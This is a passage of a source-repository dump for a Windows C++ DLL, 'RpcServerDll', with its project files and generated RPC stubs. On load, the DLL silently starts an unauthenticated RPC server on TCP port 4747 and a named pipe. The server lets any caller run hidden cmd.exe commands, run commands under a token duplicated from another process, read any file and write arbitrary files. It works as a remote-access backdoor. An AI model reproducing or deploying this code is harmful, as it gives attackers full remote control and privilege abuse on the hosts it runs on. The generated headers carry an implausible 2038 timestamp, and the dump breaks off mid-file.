rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 104 | 105 | 106 | 107 | 108 | Level3 109 | true 110 | true 111 | true 112 | WIN32;NDEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 113 | true 114 | NotUsing 115 | pch.h 116 | 4996 117 | 118 | 119 | Windows 120 | true 121 | true 122 | true 123 | false 124 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 125 | 126 | 127 | 128 | 129 | Level3 130 | true 131 | _DEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 132 | true 133 | NotUsing 134 | pch.h 135 | 4996 136 | 137 | 138 | Windows 139 | true 140 | false 141 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 142 | 143 | 144 | 145 | 146 | Level3 147 | true 148 | true 149 | true 150 | NDEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 151 | true 152 | NotUsing 153 | pch.h 154 | 4996 155 | 156 | 157 | Windows 158 | true 159 | true 160 | true 161 | false 162 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | Create 178 | Create 179 | Create 180 | Create 181 | 182 | 183 | 184 | 185 | {8558952e-c76b-4976-949f-76a977da7f8a} 186 | 187 | 188 | {6536ebec-014e-4d6b-97be-223137694ca8} 189 | 190 | 191 | 192 | 193 | 194 | -------------------------------------------------------------------------------- /RpcServerDll/RpcServerDll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Source Files 26 | 
27 | 28 | Source Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | Source Files 46 | 47 | 48 | -------------------------------------------------------------------------------- /RpcServerDll/RpcServerDll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerDll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../RpcServerInterface/RpcServerInterface.h" 5 | #include "../RpcServerInterface2/RpcServerInterface2.h" 6 | #include 7 | #include 8 | #include "Base64.h" 9 | 10 | void Execute(LPSTR* Command, LPSTR* Output) 11 | { 12 | // Prepebd "cmd.exe /c " to the command 13 | std::string command_with_prefix = std::string("cmd.exe /c ") + std::string(*Command); 14 | 15 | // Create pipes to read STDOUT 16 | HANDLE hPipeRead, hPipeWrite; 17 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 18 | saAttr.bInheritHandle = TRUE; 19 | saAttr.lpSecurityDescriptor = NULL; 20 | 21 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 22 | { 23 | *Output = strdup("Execute Failed"); 24 | return; 25 | } 26 | 27 | // Prepare structs for CreateProcess 28 | STARTUPINFOA startupInfo = { sizeof(STARTUPINFOA) }; 29 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 30 | startupInfo.hStdOutput = hPipeWrite; 31 | startupInfo.hStdError = hPipeWrite; 32 | startupInfo.wShowWindow = SW_HIDE; 33 | startupInfo.dwFlags |= STARTF_USESHOWWINDOW; 34 | 35 | PROCESS_INFORMATION processInformation = { 0 }; 36 | 37 | // Execute the command 38 | BOOL fSuccess = CreateProcessA(NULL, (LPSTR)command_with_prefix.c_str(), NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &startupInfo, &processInformation); 39 | if (!fSuccess) 40 | { 41 | 
CloseHandle(hPipeWrite); 42 | CloseHandle(hPipeRead); 43 | *Output = strdup("Execute Failed"); 44 | return; 45 | } 46 | 47 | // Read the output until the process terminates 48 | std::string output; 49 | bool bProcessEnded = false; 50 | while (!bProcessEnded) 51 | { 52 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 53 | 54 | while (true) 55 | { 56 | char buf[1024]; 57 | DWORD dwRead = 0; 58 | DWORD dwAvail = 0; 59 | 60 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 61 | break; 62 | 63 | if (!dwAvail) 64 | break; 65 | 66 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 67 | break; 68 | 69 | buf[dwRead] = 0; 70 | output += std::string(buf); 71 | } 72 | } 73 | 74 | // Clean up 75 | CloseHandle(hPipeWrite); 76 | CloseHandle(hPipeRead); 77 | CloseHandle(processInformation.hProcess); 78 | CloseHandle(processInformation.hThread); 79 | 80 | *Output = strdup(output.c_str()); 81 | } 82 | 83 | void ExecuteWithToken(LPSTR* Command, int ProcessId, LPSTR* Output) 84 | { 85 | // We need to convert the command to unicode for CreateProcessWithTokenW 86 | std::string command = std::string("/c ") + std::string(*Command); 87 | std::wstring command_w; 88 | command_w.assign(command.begin(), command.end()); 89 | 90 | // Create pipes to read STDOUT 91 | HANDLE hPipeRead, hPipeWrite; 92 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 93 | saAttr.bInheritHandle = TRUE; // Pipe handles are inherited by child process. 
94 | saAttr.lpSecurityDescriptor = NULL; 95 | 96 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 97 | { 98 | wprintf(L"Executtion failed (Error: %d).\n", GetLastError()); 99 | *Output = strdup("Execution failed"); 100 | return; 101 | } 102 | 103 | HANDLE tokenHandle = NULL; 104 | HANDLE duplicateTokenHandle = NULL; 105 | // Call OpenProcess to get a process handle 106 | HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, ProcessId); 107 | if (GetLastError() == NULL) 108 | printf("[+] OpenProcess() success!\n"); 109 | else 110 | { 111 | printf("[-] OpenProcess() Return Code: %i\n", processHandle); 112 | printf("[-] OpenProcess() Error: %i\n", GetLastError()); 113 | } 114 | 115 | // Call OpenProcessToken() to get a handle for the process token 116 | BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE, &tokenHandle); 117 | if (GetLastError() == NULL) 118 | printf("[+] OpenProcessToken() success!\n"); 119 | else 120 | { 121 | printf("[-] OpenProcessToken() Return Code: %i\n", getToken); 122 | printf("[-] OpenProcessToken() Error: %i\n", GetLastError()); 123 | } 124 | 125 | // Duplicate the process token 126 | BOOL duplicateToken = DuplicateTokenEx(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); 127 | if (GetLastError() == NULL) 128 | printf("[+] DuplicateTokenEx() success!\n"); 129 | else 130 | { 131 | printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken); 132 | printf("[-] DupicateTokenEx() Error: %i\n", GetLastError()); 133 | } 134 | 135 | // Prepare structs for CreateProcessWithTokenW 136 | STARTUPINFOW startupInfo = { sizeof(STARTUPINFOW) }; 137 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 138 | startupInfo.hStdOutput = hPipeWrite; 139 | startupInfo.hStdError = hPipeWrite; 140 | startupInfo.wShowWindow = SW_HIDE; 141 | startupInfo.dwFlags |= 
STARTF_USESHOWWINDOW; 142 | 143 | PROCESS_INFORMATION processInformation = { 0 }; 144 | // Call CreateProcessWithTokenW 145 | BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, 0, L"cmd.exe", (LPWSTR)command_w.c_str(), 0, NULL, NULL, &startupInfo, &processInformation); 146 | if (GetLastError() == NULL) 147 | printf("[+] Process spawned!\n"); 148 | else 149 | { 150 | printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess); 151 | printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError()); 152 | } 153 | 154 | if (!createProcess) { 155 | *Output = strdup("ExecuteWithToken Failed"); 156 | return; 157 | } 158 | 159 | // Read the output until the process terminates 160 | std::string output; 161 | bool bProcessEnded = false; 162 | while (!bProcessEnded) 163 | { 164 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 165 | 166 | while (true) 167 | { 168 | char buf[1024]; 169 | DWORD dwRead = 0; 170 | DWORD dwAvail = 0; 171 | 172 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 173 | break; 174 | 175 | if (!dwAvail) 176 | break; 177 | 178 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 179 | break; 180 | 181 | buf[dwRead] = 0; 182 | output += std::string(buf); 183 | } 184 | } 185 | 186 | // Clean up 187 | CloseHandle(processHandle); 188 | CloseHandle(tokenHandle); 189 | CloseHandle(duplicateTokenHandle); 190 | CloseHandle(hPipeWrite); 191 | CloseHandle(hPipeRead); 192 | CloseHandle(processInformation.hProcess); 193 | CloseHandle(processInformation.hThread); 194 | 195 | *Output = strdup(output.c_str()); 196 | } 197 | 198 | static char* ReadFile(LPSTR filename, int* length) 199 | { 200 | size_t size; 201 | 202 | // Open the file 203 | std::ifstream ifs(filename, std::ios::in | std::ios::binary | std::ios::ate); 204 | if (!ifs.is_open()) 205 | { 206 | *length = -1; 207 | return NULL; 208 | } 209 | 210 | // Get the file size 211 | ifs.seekg(0, 
std::ios::end); 212 | size = ifs.tellg(); 213 | ifs.seekg(0, std::ios::beg); 214 | char* pChars = new char[size]; 215 | 216 | // Read all bytes 217 | ifs.read(pChars, size); 218 | 219 | // Close the file and record the byte count in *length 220 | ifs.close(); 221 | *length = size; 222 | 223 | // Base64 encode the file and return it. NOTE(review): the assignment from pChars treats the buffer as NUL-terminated although no terminator is written, and pChars is never freed 224 | std::string encoded = pChars; 225 | macaron::Base64 encoder; 226 | encoded = encoder.Encode(pChars, *length); 227 | 228 | return strdup(encoded.c_str()); 229 | } 230 | 231 | void Download(LPSTR* Path, LPSTR* Data) // Sets *Data to the Base64-encoded contents of the file at *Path (NULL if the file cannot be opened) 232 | { 233 | int length = -1; 234 | *Data = ReadFile(*Path, &length); 235 | } 236 | 237 | void SaveFile(LPSTR path, char* buffer) // Decodes the Base64 text in buffer and writes the bytes to path 238 | { 239 | // Base64 decode the data. NOTE(review): Decode returns -1 without allocating when the input length is not a multiple of 4, and that result is not checked before the write below 240 | macaron::Base64 encoder; 241 | char* decoded; 242 | int length; 243 | length = encoder.Decode(buffer, &decoded); 244 | 245 | // Save the data to the caller-supplied path (the path is not validated and the decoded buffer is not freed) 246 | std::ofstream ofs(path, std::ios::out | std::ios::binary); 247 | ofs.write(decoded, length); 248 | ofs.close(); 249 | } 250 | 251 | void Upload(LPSTR* Path, LPSTR* Data) // Writes the Base64-decoded *Data to the file at *Path via SaveFile 252 | { 253 | SaveFile(*Path, *Data); 254 | } 255 | 256 | void Shutdown() // Stops the RPC listener, unregisters the interfaces, then exits the calling thread; exits the process with the status code if either call fails 257 | { 258 | RPC_STATUS status; 259 | 260 | status = RpcMgmtStopServerListening(NULL); 261 | 262 | if (status) 263 | { 264 | exit(status); 265 | } 266 | 267 | status = RpcServerUnregisterIf(NULL, NULL, FALSE); 268 | 269 | if (status) 270 | { 271 | exit(status); 272 | } 273 | 274 | ExitThread(0); 275 | } 276 | void Shutdown2() // Same operation as Shutdown; presumably the entry exposed by the second interface (TODO confirm against the IDL) 277 | { 278 | Shutdown(); 279 | } 280 | 281 | void* __RPC_USER midl_user_allocate(size_t size) // Allocation hook for the MIDL-generated stubs; forwards to malloc 282 | { 283 | return malloc(size); 284 | } 285 | 286 | void __RPC_USER midl_user_free(void* p) // Matching free hook for the MIDL-generated stubs; forwards to free 287 | { 288 | free(p); 289 | } 290 | 291 | 292 | RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE, void*) 293 | { 294 | return RPC_S_OK; // Always allow anyone: no caller authentication or authorization is performed 295 | } 296 | 297 | 298 | __declspec(dllexport) int StartServer() 299 | { 300 | RPC_STATUS status; 301 | 302 | // Register TCP/IP endpoint 303 | status = RpcServerUseProtseqEp( 
304 | (RPC_WSTR)L"ncacn_ip_tcp", 305 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 306 | (RPC_WSTR)L"4747", // TCP/IP port to use. 307 | NULL); 308 | 309 | if (status) 310 | exit(status); 311 | 312 | // Registers the first interface 313 | status = RpcServerRegisterIf2( 314 | RpcServerInterface_v1_0_s_ifspec, 315 | NULL, 316 | NULL, 317 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 318 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 319 | (unsigned)-1, 320 | SecurityCallback); 321 | 322 | if (status) 323 | exit(status); 324 | 325 | // Register named pipes endpoint 326 | status = RpcServerUseProtseqEp( 327 | (RPC_WSTR)L"ncacn_np", 328 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 329 | (RPC_WSTR)L"\\pipe\\atctl", // Hard-coded pipe name 330 | NULL); 331 | 332 | if (status) 333 | exit(status); 334 | 335 | // Registers the second interface 336 | status = RpcServerRegisterIf2( 337 | RpcServerInterface2_v1_0_s_ifspec, 338 | NULL, 339 | NULL, 340 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 341 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 342 | (unsigned)-1, 343 | SecurityCallback); 344 | 345 | if (status) 346 | exit(status); 347 | 348 | status = RpcServerListen( 349 | 2, // Recommended minimum number of threads 350 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Recommended maximum number of threads 351 | FALSE); 352 | 353 | if (status) 354 | exit(status); 355 | } 356 | 357 | 358 | 359 | BOOL APIENTRY DllMain( HMODULE hModule, 360 | DWORD ul_reason_for_call, 361 | LPVOID lpReserved 362 | ) 363 | { 364 | switch (ul_reason_for_call) 365 | { 366 | case DLL_PROCESS_ATTACH: 367 | CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartServer, 0, 0, 0); 368 | case DLL_THREAD_ATTACH: 369 | case DLL_THREAD_DETACH: 370 | case DLL_PROCESS_DETACH: 371 | break; 372 | } 373 | return TRUE; 374 | } 375 | 376 | -------------------------------------------------------------------------------- /RpcServerDll/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude 
rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /RpcServerDll/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /RpcServerDll/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.acf: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface.acf 2 | [ 3 | // This interface will use an implicit binding handle named hRpcServerInterfaceBinding. 
4 | implicit_handle(handle_t hRpcServerInterfaceBinding) 5 | ] 6 | interface RpcServerInterface // The interface is named RpcServerInterface 7 | { 8 | } 9 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | 34 | #ifndef __RpcServerInterface_h__ 35 | #define __RpcServerInterface_h__ 36 | 37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | /* Forward Declarations */ 42 | 43 | /* header files for imported files */ 44 | #include "oaidl.h" 45 | 46 | #ifdef __cplusplus 47 | extern "C"{ 48 | #endif 49 | 50 | 51 | #ifndef __RpcServerInterface_INTERFACE_DEFINED__ 52 | #define __RpcServerInterface_INTERFACE_DEFINED__ 53 | 54 | /* interface RpcServerInterface */ 55 | /* [implicit_handle][version][uuid] */ 56 | 57 | void Execute( 58 | /* [in] */ LPSTR *Command, 59 | /* [out] */ LPSTR *Output); 60 | 61 | void 
ExecuteWithToken( 62 | /* [in] */ LPSTR *Command, 63 | /* [in] */ int ProcessId, 64 | /* [out] */ LPSTR *Output); 65 | 66 | void Download( 67 | /* [in] */ LPSTR *Path, 68 | /* [out] */ LPSTR *Data); 69 | 70 | void Upload( 71 | /* [in] */ LPSTR *Path, 72 | /* [in] */ LPSTR *Data); 73 | 74 | void Shutdown( void); 75 | 76 | 77 | extern handle_t hRpcServerInterfaceBinding; 78 | 79 | 80 | extern RPC_IF_HANDLE RpcServerInterface_v1_0_c_ifspec; 81 | extern RPC_IF_HANDLE RpcServerInterface_v1_0_s_ifspec; 82 | #endif /* __RpcServerInterface_INTERFACE_DEFINED__ */ 83 | 84 | /* Additional Prototypes for ALL interfaces */ 85 | 86 | /* end of Additional Prototypes */ 87 | 88 | #ifdef __cplusplus 89 | } 90 | #endif 91 | 92 | #endif 93 | 94 | 95 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.idl: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface.idl 2 | import "oaidl.idl"; 3 | [ 4 | // A unique identifier that distinguishes this interface from other interfaces. 5 | uuid(fa161e81-6e93-4f41-961c-ee9c2e75de17), 6 | 7 | // This is version 1.0 of this interface. 
8 | version(1.0) 9 | ] 10 | interface RpcServerInterface // The interface is named RpcServerInterface 11 | { 12 | void Execute( 13 | [in] LPSTR* Command, 14 | [out] LPSTR* Output 15 | ); 16 | 17 | void ExecuteWithToken( 18 | [in] LPSTR* Command, 19 | [in] int ProcessId, 20 | [out] LPSTR* Output 21 | ); 22 | 23 | void Download( 24 | [in] LPSTR* Path, 25 | [out] LPSTR* Data 26 | ); 27 | 28 | void Upload( 29 | [in] LPSTR* Path, 30 | [in] LPSTR* Data 31 | ); 32 | 33 | void Shutdown(void); 34 | } 35 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {6536EBEC-014E-4D6B-97BE-223137694CA8} 23 | Win32Proj 24 | RpcServerInterface 25 | 10.0 26 | 27 | 28 | 29 | Utility 30 | MultiByte 31 | v143 32 | 33 | 34 | Utility 35 | MultiByte 36 | v143 37 | 38 | 39 | Utility 40 | MultiByte 41 | v143 42 | 43 | 44 | Utility 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | 
$(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | $(OutDir)RpcServerInterface.exe 100 | true 101 | $(OutDir)RpcServerInterface.pdb 102 | Console 103 | MachineX86 104 | 105 | 106 | 4 107 | Ascii 108 | false 109 | %(Filename).h 110 | 111 | 112 | 113 | 114 | Disabled 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | EnableFastChecks 117 | MultiThreadedDebug 118 | true 119 | true 120 | true 121 | 122 | 123 | Level4 124 | ProgramDatabase 125 | 126 | 127 | $(OutDir)RpcServerInterface.exe 128 | true 129 | $(OutDir)RpcServerInterface.pdb 130 | Console 131 | 132 | 133 | 4 134 | Ascii 135 | false 136 | %(Filename).h 137 | 138 | 139 | 140 | 141 | MaxSpeed 142 | OnlyExplicitInline 143 | true 144 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 145 | true 146 | MultiThreaded 147 | true 148 | true 149 | true 150 | true 151 | 152 | 153 | Level4 154 | ProgramDatabase 155 | 156 | 157 | $(OutDir)RpcServerInterface.exe 158 | true 159 | Console 160 | true 161 | true 162 | MachineX86 163 | 164 | 165 | 4 166 | Ascii 167 | false 168 | %(Filename).h 169 | 170 | 171 | 172 | 173 | MaxSpeed 174 | OnlyExplicitInline 175 | true 176 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 177 | true 178 | MultiThreaded 179 | true 180 | true 181 | true 182 | true 183 | 184 | 185 | Level4 186 | ProgramDatabase 187 | 188 | 189 | $(OutDir)RpcServerInterface.exe 190 | true 191 | Console 192 | true 193 | true 194 | 195 | 196 | 4 197 | Ascii 198 | false 199 | %(Filename).h 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | -------------------------------------------------------------------------------- /RpcServerInterface/RpcServerInterface_s.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* 
this ALWAYS GENERATED file contains the RPC server stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | #include "RpcServerInterface.h" 32 | 33 | #define TYPE_FORMAT_STRING_SIZE 11 34 | #define PROC_FORMAT_STRING_SIZE 185 35 | #define EXPR_FORMAT_STRING_SIZE 1 36 | #define TRANSMIT_AS_TABLE_SIZE 0 37 | #define WIRE_MARSHAL_TABLE_SIZE 0 38 | 39 | typedef struct _RpcServerInterface_MIDL_TYPE_FORMAT_STRING 40 | { 41 | short Pad; 42 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 43 | } RpcServerInterface_MIDL_TYPE_FORMAT_STRING; 44 | 45 | typedef struct _RpcServerInterface_MIDL_PROC_FORMAT_STRING 46 | { 47 | short Pad; 48 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 49 | } RpcServerInterface_MIDL_PROC_FORMAT_STRING; 50 | 51 | typedef struct _RpcServerInterface_MIDL_EXPR_FORMAT_STRING 52 | { 53 | long Pad; 54 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 55 | } RpcServerInterface_MIDL_EXPR_FORMAT_STRING; 56 | 57 | 58 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 59 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 60 | 61 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 62 | 
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 63 | 64 | 65 | extern const RpcServerInterface_MIDL_TYPE_FORMAT_STRING RpcServerInterface__MIDL_TypeFormatString; 66 | extern const RpcServerInterface_MIDL_PROC_FORMAT_STRING RpcServerInterface__MIDL_ProcFormatString; 67 | extern const RpcServerInterface_MIDL_EXPR_FORMAT_STRING RpcServerInterface__MIDL_ExprFormatString; 68 | 69 | /* Standard interface: RpcServerInterface, ver. 1.0, 70 | GUID={0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x17}} */ 71 | 72 | 73 | extern const MIDL_SERVER_INFO RpcServerInterface_ServerInfo; 74 | 75 | extern const RPC_DISPATCH_TABLE RpcServerInterface_v1_0_DispatchTable; 76 | 77 | static const RPC_SERVER_INTERFACE RpcServerInterface___RpcServerInterface = 78 | { 79 | sizeof(RPC_SERVER_INTERFACE), 80 | {{0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x17}},{1,0}}, 81 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 82 | (RPC_DISPATCH_TABLE*)&RpcServerInterface_v1_0_DispatchTable, 83 | 0, 84 | 0, 85 | 0, 86 | &RpcServerInterface_ServerInfo, 87 | 0x06000000 88 | }; 89 | RPC_IF_HANDLE RpcServerInterface_v1_0_s_ifspec = (RPC_IF_HANDLE)& RpcServerInterface___RpcServerInterface; 90 | 91 | extern const MIDL_STUB_DESC RpcServerInterface_StubDesc; 92 | 93 | 94 | #if !defined(__RPC_WIN64__) 95 | #error Invalid build platform for this stub. 
96 | #endif 97 | 98 | static const RpcServerInterface_MIDL_PROC_FORMAT_STRING RpcServerInterface__MIDL_ProcFormatString = 99 | { 100 | 0, 101 | { 102 | 103 | /* Procedure Execute */ 104 | 105 | 0x32, /* FC_BIND_PRIMITIVE */ 106 | 0x48, /* Old Flags: */ 107 | /* 2 */ NdrFcLong( 0x0 ), /* 0 */ 108 | /* 6 */ NdrFcShort( 0x0 ), /* 0 */ 109 | /* 8 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 110 | /* 10 */ NdrFcShort( 0x0 ), /* 0 */ 111 | /* 12 */ NdrFcShort( 0x0 ), /* 0 */ 112 | /* 14 */ 0x43, /* Oi2 Flags: srv must size, clt must size, has ext, */ 113 | 0x2, /* 2 */ 114 | /* 16 */ 0xa, /* 10 */ 115 | 0x1, /* Ext Flags: new corr desc, */ 116 | /* 18 */ NdrFcShort( 0x0 ), /* 0 */ 117 | /* 20 */ NdrFcShort( 0x0 ), /* 0 */ 118 | /* 22 */ NdrFcShort( 0x0 ), /* 0 */ 119 | /* 24 */ NdrFcShort( 0x0 ), /* 0 */ 120 | 121 | /* Parameter Command */ 122 | 123 | /* 26 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 124 | /* 28 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 125 | /* 30 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 126 | 127 | /* Parameter Output */ 128 | 129 | /* 32 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 130 | /* 34 */ 